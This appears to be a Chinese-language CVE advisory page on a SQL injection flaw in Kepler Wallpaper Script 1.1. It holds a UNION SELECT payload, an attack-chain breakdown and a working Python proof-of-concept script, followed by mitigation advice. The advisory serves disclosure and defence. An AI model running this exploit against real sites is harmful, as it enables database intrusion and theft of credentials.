CVE-2019-25576 CVSS 8.2 高危

CVE-2019-25576 Kepler Wallpaper Script SQL注入漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25576

漏洞类型

SQL注入

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Kepler Wallpaper Script

漏洞概述

Kepler Wallpaper Script 1.1版本中存在严重的SQL注入漏洞。由于应用程序在处理category参数时缺乏有效的安全过滤，未经身份验证的攻击者可以通过构造恶意的GET请求，利用URL编码的UNION SELECT语句注入并执行任意SQL代码。成功利用此漏洞可导致数据库敏感信息泄露，如管理员用户凭据、数据库名称及MySQL版本信息，对系统数据机密性构成严重威胁。

技术细节

该漏洞的核心成因在于Kepler Wallpaper Script 1.1版本在处理分类查询功能时，未能对用户提交的`category`参数实施有效的安全过滤。应用程序直接将该参数拼接到SQL查询语句中，导致了经典的SQL注入漏洞。攻击者无需进行身份验证，即可通过网络向受影响的端点发起攻击。利用方式上，攻击者通常构造包含UNION SELECT语句的Payload，并通过URL编码发送GET请求。这种联合查询技术允许攻击者在原查询的基础上附加额外的SQL指令，从而读取数据库中的敏感信息。例如，通过注入`' UNION SELECT 1, user(), database(), version(), 5-- -`，攻击者可以成功获取当前数据库用户、数据库名称以及MySQL版本号。由于该漏洞利用门槛低且无需用户交互，极易导致数据库结构和机密数据（如管理员密码哈希）的全面泄露，对系统的机密性造成严重影响。

攻击链分析

STEP 1

侦察

攻击者识别互联网上运行Kepler Wallpaper Script的目标网站。

STEP 2

武器化

攻击者构造包含SQL注入Payload（如UNION SELECT语句）的HTTP GET请求，目标是category参数。

STEP 3

交付

攻击者将构造好的恶意请求发送给目标服务器。

STEP 4

利用

目标服务器后端脚本未过滤category参数，直接将其拼接到SQL查询中执行，导致注入的恶意代码被数据库引擎解析。

STEP 5

数据窃取

数据库返回查询结果（如用户名、版本信息），攻击者通过HTTP响应获取敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2019-25576 - Kepler Wallpaper Script SQL Injection
import requests
import sys

def exploit(url):
    # Define the payload targeting the 'category' parameter
    # Using UNION SELECT to extract database version and user
    payload = "1' UNION SELECT 1, user(), database(), version(), 5--+"
    
    # Construct the full request URL
    target = f"{url}/index.php" 
    params = {
        "category": payload
    }
    
    try:
        print(f"[*] Sending request to: {target}")
        response = requests.get(target, params=params, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully. Check response for SQL output.")
            print("[+] Response snippet:")
            print(response.text[:500]) # Print first 500 chars for verification
        else:
            print(f"[-] Server returned status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error connecting to target: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print("Example: python {sys.argv[0]} http://127.0.0.1/kepler")
        sys.exit(1)
    exploit(sys.argv[1])

影响范围

Kepler Wallpaper Script 1.1

防御指南

临时缓解措施

在官方补丁发布前，建议在Web应用防火墙（WAF）中添加针对UNION SELECT、SLEEP()等SQL注入特征的过滤规则。同时，检查服务器日志中是否存在针对category参数的异常请求，并暂时禁用受影响的分类查询功能（如果业务允许）。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表